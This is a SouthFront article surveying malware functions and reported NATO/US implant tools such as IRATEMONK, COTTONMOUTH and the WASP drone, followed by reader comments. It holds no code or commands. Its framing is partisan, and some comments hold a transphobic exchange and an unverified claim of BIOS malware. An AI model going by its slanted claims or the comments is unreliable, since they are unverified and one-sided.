An Overview of NATO Efforts To Remotely Embed Malware

Support SouthFront

An Overview of NATO Efforts To Remotely Embed Malware


Today, one of the top priority dimensions of raising capabilities of cyberoperations is the creation of special hardware and software appliances and information technologies to carry out intelligence-gathering and offensive operations. It involves active development of so-called information weapons, a category that encompasses the whole range of means of attacking the adversary’s information resources. This type of attack mainly affects computer and telecommunications systems, including software, databases, computing and data processing, and also communications networks.

Of particular importance is the establishment of dedicated offensive technologies that can be applied covertly against command and control infrastructure in order to disrupt the orderly functioning of their key components, and to seize control over them.

Intellligence-gather cyber tools are intended to collect information about adversary, including structure, functioning, and vulnerabilities of its command systems. To achieve that, automated workstations will have malware inserted in order to establish a distributed, remotely controlled, intelligence gathering network. It may include thousands of computers in government and military facilities in various countries.

The definition of malware includes external or internal programming code possessing various destructive functions, such as:

  • destroying or changing software, destroying or corrupting data after a certain condition is met (“logic bombs”);
  • exceeding the user’s authority in order to copy confidential information or to make such copying possible (“trojan horses”);
  • corrupting protection systems or making it possible to bypass them;
  • intercepting user login credentials through phishing or keystroke logging;
  • intercepting data flowing within a distributed systems (monitors, sniffers);
  • concealing one’s presence;
  • self-replication, associating with other software and/or embedding own fragments into other operating or external memory not originally targeted by the malware;
  • destroying or corrupting software code in operating memory;
  • corruption, blocking, or supplanting data created by applications and entered into data links or external memory.

Overall, there are three main types of destructive functions that may be performed by malware:

  • Preserving or collection of fragments of data created by user, applications, uploading and downloading data, in external memory (local or remote) in the net or a stand-alone computer, including passwords, keys, and other access credentials, confidential documents in electronic form, or simply general corruption of fragments of sensitive data;
  • Changing application algorithms (deliberate action against external or operating memory), in order to change the basic logic of their functioning;
  • imposing a specific work regime or changing data being recorded by data produced by malware.

Overall, the use of malware assumes the existence of an internal distribution mechanism to spread it to global or local networks, including the internet, to carry out specific tasks. These may include:

  • penetrating remote computers to completely or partially seize control;
  • launching own copies of malware on the infected computer;
  • possible further penetration of all available networks.

Such malware is mainly distributed as files attached to emails and electronic messages, and also through specially placed hyperlinks. This type of attack is distinguished by its scale and high speed of infection. Internet sites engaged in spreading malware increase by a factor of two every year. These sites attract attention of internet users by posting current informational content: news, analysis, overview of information technologies, and also commercial and entertainment articles. More than 20% of sites are specifically intended for malware distribution.

An Overview of NATO Efforts To Remotely Embed Malware


Other means of using malware include:

  • distributed denial of service (DDOS) attacks by generating intense traffic from false requests, which makes it impossible for actual users to gain access to the network or servers;
  • dissemination of malware through USB memory devices, the most efficient means of doing so;
  • embedding and activating code inserts.

At the same time, many NATO countries have established military units for cyber-operations, and also pursue the development of scientific and technical infrastructure to develop special information technologies for offensive use, including self-multiplying and self-distributing malware, and developing doctrines for their use.

Moreover, there is the so-called file-less (packet) malware distributed as net packets and penetrating computers through OS vulnerabilities or security holes in applications.

In order to embed malware remotely, one can use social engineering or weaknesses in organizational network administration, such as unprotected local disks.

The most widespread means of embedding malware is the Internet. Offensive malware targets both individual computers and networks. It accomplishes penetration using known and newly discovered weaknesses of both software and hardware developed by the potential adversary, but also in devices and programs developed by the world’s leading IT firms, most of which are based in the US.

Other means of embedding malware are: agents, remote technical means including peripheral appliances of the system being attacked, combined attacks, etc. Malware developers focus on the ability to maintain stealthy presence amidst the target’s software and remain there even after an upgrade or software renewal.

Main means of covert embedding of malware include:

  • Pretending to be ordinary software. This approach assumes embedding malware using the process of installing a new application. It may be embedded in graphic or text editors, system utilities, screensaver, etc. Its existence is not concealed after installation;
  • Pretending to be a module for expanding the computing environment. It’s a frequent variation on the previous one, and uses access to the ability to expand environments. For example, for Microsoft Windows OS such modules may include DLL modules and drivers, potentially containing malware;
  • Malware replacing one of several application modules of the attacked environment. This method consists of choosing one or several modules for replacement with malware-infected modules in order to carry out the intended tasks. Such malware should externally be able to carry out the normal functions of the software thus targeted;
  • Direct association. This method consists of associating malware with executable files of one or several legal programs in the system. This is the simplest method for single-task, single-user systems;
  • Indirect association. It consists of associating malware with the code of a software module loaded into operating memory. In this instance the executable file remains unchanged, which makes malware detection harder. It’s also necessary to ensure the installable part of the virus already is present in the system.

The most potentially useful means of embedding malware, not including through global networks, in order to gain covert access to enemy networks are:

IRATEMONK allows embedding of malware in order to conduct surveillance on desktop and portable computers through recording onto the hard-drive BIOS, giving it the ability to implement its code by replacing the MBR. It works on various types of hard drives, including Western Digital, Seagate, Maxtor, and Samsung. It supports FAT, NTFS, EXT3, and UFS file systems, but systems with RAID are not. After embedding, IRATEMONK launches its payload every time the target computer is turned on.

SWAP allows embedding malware for espionage by using motherboard BIOS and HPA domain of the hard drive by running the OC launch code. This program allows remote access to various operating systems (Windows, FreeBSD, Linux, Solans) with various file systems (FAT32, NTFS, EXT2, EXT3, UFS 1.0). Two utilities are used for installation: ARKSTREAM (it spoofs the BIOS) and TWISTEDKILT (it writes SWAP protocol and the malware payload to the HPA area of hard drive, and is used mainly against cell phones).

COTTONMOUTH is a USB device insert providing a wireless bridge to the target network and also for loading exploits to the target system. It may open a covert channel to send commands and data. Built-in radio transmitter allows it to collaborate with other COTTONMOUTH. It’s based on TRINITY component base, with HOWLERMONKEY used as the transmitter. There’s also a version called MOCCASIN, which is inserted into a USB keyboard’s commutation matrix.

FIREWALK is an insert used to passively collect Gigabit Ethernet traffic, and to embed malware into Ethernet packets. It can create a VPN tunnel between the targeted network and the center. It’s possible to establish wireless communications with other HOWLERMONKEY-compatible devices. This insert is similar in execution to COTTONMOUTH. It uses TRINITY component base, and HOWLERMONKEY as transmitter.

NIGHTSTAND is a mobile system for active attacks on Wi-Fi nets, with the target being Windows machines when direct access is not possible. The system is based on a notebook-type portable computer running Linux and equipped with radio communications. External amplifiers and antennas give it range of up to 13km.

DEITYBOUNCE delivers programming access to Dell PowerEdge servers with the help of motherboard BIOS and the use of the SMM regime to obtain the ability to launch itself before the system is launched. After set-up, it will run every time the system is switched on.

FEEDTROUGH is equipment for installing two types of malware, BANANAGLEE and ZESTYLEAK, used to overcome network firewalls. This method is used when the firewall is launch. Malware’s installation is performed if operating system is present in the database, otherwise it is installed normally. FEEDTROUGH remains in place when the firewall operating system is updated.

CTX4000 is a portable continuous emitter. It is used to obtain data from inserts installed on targeted systems.

NIGHTWATCH is a PC-based system, used to process signals from the targeted monitor. Signals may be obtained using data collection systems (inserts in fiberoptic cables) or from a general purpose receiver.

HOWLERMONKEY is a short- and medium-range radio transmitter. It is a special radio module for other inserts. It is used to collect data from inserts and enabling remote access to it.

Moreover, there are other methods of embedding malware, through transceivers installed in USB cables or devices, through Wi-Fi, Bluetooth, GSM devices and cables attached to the targeted computer.

One of the promising methods of remote malware placement is the unmanned aerial vehicle (UAV). USAF specialists have developed the WASP (Wireless Aerial Surveillance Platform) UAV on the basis of the FMQ-117B aerial target. It’s main mission are reconnaissance cyberoperations. Thanks to its onboard equipment, it may break into detected Wi-Fi networks, intercept cell phone conversations. WASP equipment includes HD-resolution camera, 11 antennas for various radio communications, GPS receiver, and onboard computer running Linux. Its memory contains a malware arsenal to break into wireless networks and a dictionary with 340 thousand words for “brute force” attacks. Obtained data and intercepted conversations are recorded in the onboard computer memory (solid-state hard drive with 500 GB memory) and may also be sent using internet channels to a special server using 3G and 4G networks, or the compromised Wi-Fi hot-spots.

The UAV’s GPS allows it to operate autonomously along an assigned route, but it needs operator’s involvement for take-off and landing. Each system costs about $6 thousand, not including the cost of the UAV.

Similar efforts are underway by US Army Cyber Command in order to interfere with automated command points at tactical and operational levels. The Sun Eagle tactical reconnaissance UAV is being used to test equipment for remote malware insertion into Wi-Fi and LTE wireless networks.

Overall, United States and NATO are developing various methods and means for remote malware insertion. They include various physical data processing and transmission, and also different environments for proliferation. Countering such types of cyber weapons is a difficult and complex task, demanding considerable research efforts and financial expenditures.


Support SouthFront

Notify of
Newest Most Voted
Inline Feedbacks
View all comments


Bobby Twoshoes

This would be the perfect article for that tranny who keeps spamming dodgy links to check out her “nude pics”.

Tommy Jensen

Ohh dear ohh dear. What have you against trannies little boy.

Bobby Twoshoes

Certainly not any part of my body. In all fairness though I did call it her.

AM Hants

Vault 7 and Crowdstrike, supported by Google, so comes to mind.

Hope Russia stays well ahead of the it.


Am a sr Systems analyst and for the past few years, been having an issue but finally tracked it down. It doesn’t need to be an attachment. What appears to be a DOS attacked followed by a failed port scan was not failed, very successfull. As a matter of FACT its automated to attack every one that logs into southfront. California ip with more than 15 million complains on line and 17 K complaints to FBI has been doing this for years. It uses windows update protocol to modify you BIOS. installs new user and grants it permission to read and execute, removes all other permissions. system, virus detection, even so called trusted installer can not see it. All one can do is to copy its security token of a ruining job, run a batch job … and can only view its files. Reinstalling bios fails, either because the virus hides in a driver, does not allow proper re installation. Computer also will never properly restart, always resuming even after a simulated crash!. All information from hard drive, video, audio near by devices hacked though blue tooth are encrypted and sent to another ip in California, I have copies of the old and newer versions if some one wants to help out.

Karen Bartlett

This means all of us who have ever watched SF are now on a government list for malware and/or surveillance?

Tommy Jensen

Just stay criminal. They will not touch you.
“Capitalization by destruction” is one of the Bankers profit schemes in collusion with Liberals.

Recall these divorce waves?
Divorce makes sale of 1 house and buy of 2 new houses. The children get in troubles.
The Bankers earn on money exchange, new loans, more debt, the lawyers earn on court cases, legal papers, the liberals earn office jobs on social welfare and social problem handling. All pure destructive hot air activity.
Capitalization by destruction.

Same with these MIC concepts. Capitalization by destruction. Bankers, Lawyers and Liberals live as pure parasites on anyone who produce a physical item.

Anthony Papagallo

They dont need to spy on me.
If the U.S gov wants to know what porn sites I like to view they only have to ask me.

T M Bacon

It sounds like the internet is going to become a great pea soup of malware corruption that will slow every device that links to it down to a crawl. One can only hope that all this comes back to bite these bloody vandal’s on their cybernetic bums.

chris chuba

Russia, China, and Iran are going to buy U.S. designed / source electronics, NW equipment, Operating systems, PC’s because …. they have a death wish? I know that they are stuck now but with Russian SW Chinese SW and manufacturing and Linux OS this cannot last forever.

Ivan Freely

It’s only a matter of time now for others such as China and Russia to develop their own computing systems. Stupid fools. The Americans effectively killed their computing future in the massive emerging markets.

Karen Bartlett


Karen Bartlett

Welp, on my way to read another SF article…

Emmanuel Goldstein

ironically, the disqus scripts on this comment section trigger a clickjacking warning.

decent primer article but the main threat at the nation state/military level is from physical access. that’s true down to the home consumer level as well. stuxnet is one example; as advanced as it was, it still required an “inside man” to deliver it to the SCADA system in person as the network was more or less “airgapped” from any other extranet.

even less sophisticated malware and ransomware requires a heavy dose of interaction with an end user through clicking on links and fake alert messages and etc. proper IDS/IPS and permission set up (i.e. don’t let non-admins run as root and even admins stick to a non-root account unless doing maintenance) will detect or block most attacks.

there’s a joke in IT where problems are given the code PICNIC. it stands for “problem in chair, not in computer”. most attacks are from uneducated users so they’re – for better or worse – the last line of defense.

Ivan Freely

Never heard of PICNIC but have heard and used PEBCAK. Same thing.

Tommy Jensen

Which adversary or enemy if I may ask???
Nato and Pentagon are fighting ghosts. Pouring $1 trillion down the drain every year to fantasy fights, and those who are involuntary targets have to spend equally as much, to defend themselves against Hot Air organisations.

Luke Hemmming

That means some NATO or US cyber centre employee is fapping over my porn collection!! Hope you are enjoying my collection of John Holmes and James Deen vids bwahahaha


So will this work better than the covid malware? Other wise we can see european cars driving off the cliff soon after..